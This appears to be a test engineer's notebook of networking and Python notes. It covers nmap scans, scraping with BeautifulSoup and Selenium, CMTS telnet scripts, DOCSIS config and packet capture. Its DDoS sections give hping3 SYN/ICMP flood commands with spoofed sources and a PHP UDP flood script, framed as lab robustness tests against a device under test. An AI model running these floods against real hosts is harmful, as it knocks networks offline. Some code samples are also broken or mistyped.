scanning port (NMAP)

 

TCP:

nmap -v -sT -T2 -Pn -p T:5060,111,65431,44318,4159,80,443,53 IPv4-Address

nmap -v -sT -T2 -Pn -p T:52224,705,111,51413,37915,4159,22,23 -6 IPv6-Address

UDP:

nmap -v -sU -T2 -Pn -p U:1293,111,161,162,3000,5060,546,53  IPv4-Address

nmap -v -sU -T2 -Pn -p U:1293,111,2427,161,162,3000,546 -6  IPv6-Address

hping IP Flood attack to DUT

 1. Connect a LAN PC to DUT via ethernet. Do " ping  8.8.8.8 -t" and access websites, can success.

2. Use hping3 command " hping3 -S -P -U --flood -V --rand-source DUT-IP" ( DUT's  IP) to attack DUT WAN IP.

3. After a while, no more than 1 minutes, LAN PC can not ping successfully, and can not access internet.

4. Use hping3 command "hping3 -1 --flood -V target" generate icmp flood to attack DUT WAN IP.

5. After a while, LAN PC can not ping successfully, and can not access internet.

pyhton error Anaconda3

if you run python see this problem related to Anaconda3
Anaconda3\lib\site-packages\numpy\__init__.py:140: UserWarning: mkl-service package failed to import, therefore Intel(R) MKL initialization ensuring its correct out-of-the box operation under condition when Gnu OpenMP had already been loaded by Python process is not assured. Please install mkl-service package, see http://github.com/IntelPython/mkl-service

Solution:
go to environment setting and add this in it: C:\Users\username\Anaconda3\Library\bin

python with database

import sqlite3
conn = sqlite3.connect('D:\\hskio_python.db')
try:
    info = []
    cur = conn.cursor()
    rows = cur.execute('select * from person')
    for row in rows:
        id = row[0]
        hei ght = row[2]
        weight = row[3]
        bmi = round(weight/height**2, 2)
        print(id, height, weight, bmi)
        info.append([bmi, id])
    for data in info:
        cur.execute('update person set bmi=%d where id=%d' % (data[0], data[1]))
    conn.commit()
    
finally:
    conn.close()

beautifulsoup example

 beautifulsoup example 

Find and Findall Parameter:

findAll(tag, attributes, recursive, text, limit, keywords)
find(tag, attributes, recursive, text, keywords)

Find Parameter: 
 beautifulsoup example  Find h1 tag

import requests
from bs4 import BeautifulSoup
resp=requests.get("https://code-gym.github.io/spider_demo/")
soup=BeautifulSoup(resp.text, 'html5lib')
print(soup.find('h1'))

beautifulsoup print with tag and without

With tag 

print(soup.find('h1'))

Without tag 

print(soup.h1)

Findall parameter: 

for h3 in soup.find_all('h3'):
   print(h3)

Find class name

for title in soup.find_all('h3','post-title'):
    print(title)

beautifulsoup crawl ptt sock

去ptt 股票爬文章

import requests
from bs4 import BeautifulSoup
import time
today = time.strftime('%m/%d').lstrip('0')

def ptt(url):
    resp = requests.get(url)
    if resp.status_code != 200:
        print('URL發生錯誤:' + url)
        return
    soup = BeautifulSoup(resp.text, 'html5lib')
    paging = soup.find('div', 'btn-group btn-group-paging').find_all('a')[1]['href']

    articles = []
    rents = soup.find_all('div', 'r-ent')

    for rent in rents:
        title = rent.find('div', 'title').text.strip()
        count = rent.find('div', 'nrec').text.strip()
        date = rent.find('div', 'meta').find('div', 'date').text.strip()
        article = '%s %s:%s' % (date, count, title)

        try:
            if today == date and int(count) > 10:
                articles.append(article)
        except:
            if today == date and count == '爆':
                articles.append(article)
    if len(articles) != 0:
        for article in articles:
            print(article)
        ptt('https://www.ptt.cc' + paging)
    else:
        return

ptt('https://www.ptt.cc/bbs/Stock/index.html')

python changed pip

if our install pyton2 and python3 on your PC, it might used python2's pip. you can used the command

pip --version
D:\selenium-3.141.0.tar\dist\selenium-3.141.0>pip --version
pip 20.1.1 from c:\python27\lib\site-packages\pip (python 2.7)

you can also do like this :

#python36\Scripts\pip.exe install packagename

Example:
C:\python37\Scripts>pip3.exe install packagename

reference:
https://stackoverflow.com/questions/39851566/using-pip-on-windows-installed-with-both-python-2-7-and-3-5
https://stackoverflow.com/questions/40832533/pip-or-pip3-to-install-packages-for-python-3

selenium problem

This is a interesting topic and funny thing about selenium, after surfing on the net, i find this article which really solve the problem.

https://medium.com/@shashanksrivastava/how-to-fix-no-module-named-selenium-error-in-python-3-da3fd7b61485

Problem: Used pip to install selenium and show install success. But module ONLY work on Python2 BUT Python3 DON'T work. Sound really strange, isn't.  

Solution: So just download selenium package and manual install. 

How: Just extract the file and go to the directory and used the command will install:

python

Conclusion is we have to manual install selenium . 

Seliunm

Chrome diver: chromedriver
https://chromedriver.chromium.org/downloads

Firefox driver: geckodriver
https://github.com/mozilla/geckodriver/releases

Basic Selenium

from selenium import webdriver
browser=webdriver.Chrome('D:\\chromedriver.exe')
browser.get('http://google.com')
browser.quit() 

Selenium with beautifulsoup example 1: will pop chrome 

from selenium import webdriver
from bs4 import BeautifulSoup
try:
    chrome=webdriver.Chrome(executable_path='D:\\CHROME_DRIVER\\chromedriver.exe')
    chrome.set_page_load_timeout(10)
    chrome.get('https://code-gym.github.io/spider_demo/')
    soup = BeautifulSoup(chrome.page_source, 'html5lib')
    print(soup.find('h1').text)
finally:
browser.quit() 

Selenium with beautifulsoup example 2: will run chrome at daemon

from selenium import webdriver
from bs4 import BeautifulSoup
try:
    options = webdriver.ChromeOptions()
    options.add_argument('--headless')     
    chrome=webdriver.Chrome(options=options,executable_path='D:\\CHROME_DRIVER\\chromedriver.exe')
    chrome.set_page_load_timeout(10)
    chrome.get('https://code-gym.github.io/spider_demo/')
    soup = BeautifulSoup(chrome.page_source, 'html5lib')
    print(soup.find('h1').text)
finally:
browser.quit() 

Selenium with beautifulsoup using xpath to find related article 

from selenium import webdriver
from bs4 import BeautifulSoup
try:
.    options = webdriver.ChromeOptions()
    ..........................
    ..........................
    ..........................
  print(soup.find('h1').text)
  chrome.find_element_by_xpath('/html/body/div[2]/div/div[1]/div[1]/div/div/h3/a').click(
  print(chrome.find_element_by_xpath('//*[@id="post-header"]/div[2]/div/div/h1').text)
finally:
browser.quit() 

VOIP Set IPv6

In order to set IPv6 under MTA(VOIP) you need to set your DUT as below:

CM IPv4 and IPV6 policy set under option:    [17] (dhcp6-cablelabs-config) set as below
v6 ONLY:

(enterprise-id 4491((tftp-servers 32 2001:0:130::50)(config-file-name 33 xxxcfg)(syslog-servers 34 2001:0:130::50)(rfc868-servers 37 2001:0:130::50)(time-offset 38 8h)(ip-pref 39 2)(cablelabs-client-configuration 2170 (primary-dhcp-server 1 192.168.1.50))(cablelabs-client-configuration-v6 2171 (primary-dhcpv6-server-selector-id 1 20:01:00:00:01:30))))

dual  ONLY:

(enterprise-id 4491((tftp-servers 32 2001:0:130::50)(config-file-name 33 xxxcfg)(syslog-servers 34 2001:0:130::50)(rfc868-servers 37 2001:0:130::50)(time-offset 38 8h)(ip-pref 39 5)(cablelabs-client-configuration 2170 (primary-dhcp-server 1 192.168.1.50))(cablelabs-client-configuration-v6 2171 (primary-dhcpv6-server-selector-id 1 20:01:00:00:01:30))))

MTA IPv4 and IPV6 policy set as below

(enterprise-id 4491((tftp-servers 32 2001:0:130::50)(config-file-name 33 xxx.bin)(syslog-servers 34 2001:0:130::50)(rfc868-servers 37 2001:0:130::50)(time-offset 38 8h)(cablelabs-client-configuration 2170 (primary-dhcp-server 1 192.168.1.50))(cablelabs-client-configuration-v6 2171 (primary-dhcpv6-server-selector-id 1 01:02:03:04:05:06:07:08:09)(provisioning-server 3 (flag 0; provisioning-server prov.ht.com.))(kerberos-realm 6 BASIC.1.))))

CBR8 some command

Cisco CBR8 Command Note

1. see all dut online on CMTS
command: scm
note: scm is abbreviated as show cable modem
2. see only how many dut device locks
command: show cable modem docsis version d31-capable

CMTS(CBR8) Check US power

If your CM only locked 1 ofdma, but your throughput is les than 10Mbps, please go to see your UPstream power.

You can go to CMTS to see your US subcarrier

Command: show cable modem xxxx.xxxx.xxxx prof-mgmt upstream
(xxxx.xxxx.xxxxx mac address)

bsod

BSOD Setting

BSOD Check from CMTS to see anyone is using it
#show cable l2-vpn xconnect dot1q-vc-map

Note: If someone is using the same BSOD Vlan id with you, your DUT might not be able to get online












BSOD Configure File:

Vlan Setting

How to test.
Environment :

WIFI common concept

802.11b(2.4G)
802.11g(2.4G)
802.11a(5G) old 5G
802.11n- HT( or Legacy 2.4G)
802.11ac -VHT(5G)
802.11ax -HE(5G)

When people talk about
When people talk about 5G we will refer to 11AC and 11AX.
Some people will use
11AC as VHT
11AX as HE
11N as VHT or Non-HT（Legacy）

BandWidth:
2.4G: 20,40 MHz

5G: 40,80,160 MHz

WIFI-Max Client(IXVeriwave)

This is to stimulate how many client wifi is able to support using Veriwave(IXIA).

1. Go to ixia-veriwave and choose max client

2. GO to Test, and set Max client Capacity properties 

test file

PS C:\Lab\create-image>

python telnet to cmts to get ipv6

This is a script to telnet to CMTS-Cisco server to get ipv6 address

The different between python2 and python3 is the byte and str

PYTHON3 we need to use tn.read_until(b"Username:")
PYTHON2 we don't need byte tn.read_until("Username:")

since we need to used byte, so we have to convert to str using decode
we can use decode utf-8 or big5, depend on our OS. If you used CHINESE you have to used BIG5, else ping will not show correct.

Manual Test: 
1.Login to CMTS/Cisco Server
2. used the command to see your ipv6 addres: scm XXX.XXX.XXXX ipv6


1)Method 1 python3 just telnet and get the ipv6 of specfic mac

import getpass
import re
import telnetlib
HOST = "192.168.1.252"
#user = input("Enter your remote account: ")
#password = getpass.getpass()
user='guest'
password='guest'
tn = telnetlib.Telnet(HOST)

tn.read_until(b"Username:")
tn.write(user.encode('ascii') + b"\n")
if password:
    tn.read_until(b"Password:")
    tn.write(password.encode('ascii') + b"\n")

value = tn.read_until(b"Router#")
tn.write(b"scm mac = "AAAA.BBBB.CCCC" ipv6 \n")
value = tn.read_until(b"Router#")
#######################################################
value=value.decode('utf8')
info = "2001"
matchObj = re.match(r'.*'+ info + '(.*)\n',value, re.M|re.DOTALL)
#matchObj=matchObj.decode('big5')

       
if matchObj:
    Ipv6_address = info + matchObj.group(1)
    Ipv6 = Ipv6_address.replace("\n", "")
    print(Ipv6)
    #return Ipv6

else:
    print ("No match!!")  
  

####################################################
        
tn.write(b"exit\n")
#print(tn.read_all().decode('ascii'))

2)Method 2 using function and check telnet reachable or not(python3)

# -*- coding: utf-8 -*-
import telnetlib
import subprocess
import time
import re

def Telnet_Check_reachability(ip):
    ping_count=3
    process = subprocess.Popen(['ping', ip, '-n', str(ping_count)],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT)
                      
    process.wait()
    stdout = process.stdout.read()
    stdout=stdout.decode("big5")
    #print stdout
    if "TTL=" in stdout:
        #print "Server reachable"
        successful = 1
    else:
        #print "Server unreachable"
        successful = 0
    return successful

def Login_Telnet(HOST,username,password):
    try:
        tn=""
        reachability=Telnet_Check_reachability(HOST)
        if (reachability==1):
            tn = telnetlib.Telnet(HOST,23)
            tn.read_until(b"Username:")
            #tn.write(username + "\n")
            tn.write(username.encode('ascii') + b"\n")
            if password:
                tn.read_until(b"Password:")
                #tn.write(password + "\n")
                tn.write(password.encode('ascii') + b"\n")
            time.sleep(3)
            return tn
    except IOError:
        print ("Telnet " + HOST + " failed. Please check the server connection")

def telnet_To_CMTS(Client_IP, Client_Name, Client_Pwd, MAC):
    tn =Login_Telnet(Client_IP, Client_Name, Client_Pwd)
    if "telnetlib" in str(tn):
        time.sleep(1)
        value = tn.read_until(b"Router#")
        command = "scm " + MAC + " ipv6\n"
        tn.write(command.encode('ascii') + b"\n")
        #tn.write(command)
        
        value = tn.read_until(b"Router#")
        #print value
        tn.close()
        time.sleep(1)

        info = "2001"
       
        #value=str(value)
        value=value.decode('utf8')
        
        matchObj = re.match(r'.*'+ info + '(.*)\n',value, re.M|re.DOTALL)
       
        if matchObj:
            Ipv6_address = info + matchObj.group(1)
            Ipv6 = Ipv6_address.replace("\n", "")
            return Ipv6
        else:
           print ("No match!!")    
        
    else:
        print ("Telnet failed")
ip ="192.168.1.252"
username = "guest"
password = "guest"
mac = "AAAA.BBBB.CCCC"
new_IPv6 = telnet_To_CMTS(ip, username, password, mac)
print (new_IPv6)

3)Method 3 same as method2 using python2

# -*- coding: utf-8 -*-
import telnetlib
import subprocess
import time
import re

def Telnet_Check_reachability(ip):
    ping_count=3
    process = subprocess.Popen(['ping', ip, '-n', str(ping_count)],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT)
                      
    process.wait()
    stdout = process.stdout.read()
    #print stdout
    if "TTL=" in stdout:
        #print "Server reachable"
        successful = 1
    else:
        #print "Server unreachable"
        successful = 0
    return successful

def Login_Telnet(HOST,username,password):
    try:
        tn=""
        reachability=Telnet_Check_reachability(HOST)
        if (reachability==1):
            tn = telnetlib.Telnet(HOST,23)
            tn.read_until("Username:")
            tn.write(username + "\n")
            if password:
                tn.read_until("Password:")
                tn.write(password + "\n")
            time.sleep(3)
            return tn
    except IOError:
        print "Telnet " + HOST + " failed. Please check the server connection"

def telnet_To_CMTS(Client_IP, Client_Name, Client_Pwd, MAC):
    tn =Login_Telnet(Client_IP, Client_Name, Client_Pwd)
    if "telnetlib" in str(tn):
        time.sleep(1)
        value = tn.read_until("Router#")
        command = "scm " + MAC + " ipv6\n"
        tn.write(command)
        value = tn.read_until("Router#")
        #print value
        tn.close()
        time.sleep(1)

        info = "2001"

        matchObj = re.match(r'.*'+ info + '(.*)\n',value, re.M|re.DOTALL)
        if matchObj:
            Ipv6_address = info + matchObj.group(1)
            Ipv6 = Ipv6_address.replace("\n", "")
            return Ipv6

        else:
           print "No match!!"    
    else:
        print "Telnet failed"


ip ="192.168.1.252"
username = "guest"
password = "guest"
mac = "AAAA.BBBB.CCCC"
new_IPv6 = telnet_To_CMTS(ip, username, password, mac)
print new_IPv6

Unicode and decode python

Python2 uses str, but in python3 it uses byte.

1. str can be encoded into bytes using the encode() method.
2. bytes can be decoded to str using the decode() method.

Reference 

https://medium.com/better-programming/strings-unicode-and-bytes-in-python-3-everything-you-always-wanted-to-know-27dc02ff2686

you can use type(var) to see what type is it. 

Bash append file to date and time format

Some people would like to export or append your file or log name after the date and time format, like this YYMMDD_MMHHSS.

i have a script it is able to append in this style

@ECHO OFF
set datetime=%date:~0,4%-%date:~8,2%-%date:~0,2%_%time:~0,2%%time:~3,2%%time:~6,2%
set datetime=%datetime: =0%
echo hello >>%datetime%.txt
EXIT

It will output like this "2020-17-20_104919.txt"

if you don't want the second just modify like this

set datetime=%date:~0,4%-%date:~8,2%-%date:~0,2%_%time:~0,2%%time:~3,2%%time:~4,0%

Resource: 

https://stackoverflow.com/questions/1192476/format-date-and-time-in-a-windows-batch-script

ddos and security

DDOS Related attack command

command:
1. run attac, and run bulk call should not have problem

hping2  wan0 -2 0i u2 -I eth1

hping2  mta0 -2 0i u2 -I eth1

2. while running attack =, on CPE browser WEB will cause kernel panic
hping3 -V -c 10000 -d 300 -S -p 80 -w 1500 --flood 10.15.3.4 (dummy0.3)
CPE1(lan)-------
CM-------
CMTS-----------CPE2(linux/ubuntu)
CPE1: open browser (youtube channel)
CPE2: used linux to run hping

Script to attach:

<?php 

$host = '10.200.114.18';

$pps = 5000; 

$tune = 125; 

$sock = socket_create( AF_INET, SOCK_DGRAM, SOL_UDP ); 

$uslp = (1000000 / $pps) - $tune; 

if( $uslp < 0 )

$uslp = 0; 

for( $i = 6500000; $i > 0; $i-- )

{ $port = rand( 1025, 65535 ); socket_sendto( $sock, 'LUT2', 4, 0, $host, $port ); usleep( $uslp ); }

?>

IP Passthrough

How to test IP PASS Through

TEST STEP:

With MAC address

1)      Let modem to get online

2)      Connect CPE to CM on lan side

3)      Access GUI from Lan side, and add cpe mac address from ip passthrough

4)      CPE will get the same domain as erouter0

5)      Ping to cpe from CMTS or back of cmts

CPE1----------CM--------------CMTS------------CPE2

Cpe1 will get a public ip (same domain as erouter0)

CPE2 should be able to ping to CPE1

bsod

check BSOD on CMTS

#show cable l2-vpn xconnect dot1q-vc-map

Set VLAN on your config

tcpdump and tftp command

1. Window TFTP Command
tftp -i [IP ADD] [PUT|GET][ FILE NAME]
-g:     get file
 -r:     remote
 -p:     put file
  -l:     local

tftp -i 192.168.1.55 PUT test.txt

2. TFTP Linux
Example: 

tftp [-g|-p]  -r FILENAME SERVERIP

Download: 

tftp -g -r tcpdump 192.168.1.50

Upload

example: tftp -p -r test.txt 192.168.1.50

3. TCPdump and tftp Command, doing packet capture under ROUTER 
You can do this on linux PC also 

Capture all packet:

#cd /var/tmp

#tcpdump -nni any

Capture wan0 interface 

tcpdump -i wan0 -s 0 -w wan0.pcap&

stop capture packet, kill process id

#ps |grep .pcap

#kill -s tcpdum 'pid'

upload to your pc by tftp command

tftp -l wan0.pcap -p 192.168.1.50

Macro-Script

How to used Macro Script(Terateam) to do studd like console:

Example 1 using telnet method to login cisco server or router: 
File name: telnet_cisco.ttl

timeout = 10

connect '192.168.1.252:23 /nossh /T=1'




;Wait a prompt message to login

wait 'Username:'

; Send username

sendln 'cisco'




;Wait for a keyword to enter password

wait 'Password:'

; Send password

sendln 'cisco'

File name: cisco.bat

@echo off

cd C:\Program Files (x86)\teraterm

TTERMPRO /m=D:\Macro_script\telnet_cisco.ttl

pause

How to used it:
Just run the cisco.bat, it will automatic telnet  for you.

Example 2: using serial comport to login your console 
File name: comport.ttl

pause 5

;sendin command

sendln "pacm "

pause 2

;closett will close the screen

closett

File name: comport.bat

@echo off

cd C:\Program Files (x86)\teraterm

TTERMPRO /C=3 /BAUD=115200 /c=3 /m=D:\comport.ttl

pause

How to used it:
Just run the comport.bat, it will automatic accees using terateam to open com-port3 to your DUT console. If  you have different com-port just changed the c=3 to correct com-port. My console port is 3, so I set to 3.

wireshark Filter

Find IPV4 MAC address for DHCP

bootp.hw.mac_addr ==XX:XX:XX:XX:XX:XX

Find IPV6 MAC address for DHCP

dhcpv6.duidll.link_layer_addr == “XX:XX:XX:XX:XX:XX”

Find DNS Qeuery:

dns.qry.name == “XXX.XX.com”

Filter specific IP address overnight or many days. 

If you used above method, your PC might hang. Basely above capture all the packet and just filter. But this is not the best way if you want to capture many hours.  

In order to solve this problem, you have to just capture you wanted packet, it will not capture other packet. 

capture>options>capture filter>type your target to filter(ex: host xxx.xxx.xxx.xxx && udp port=XX)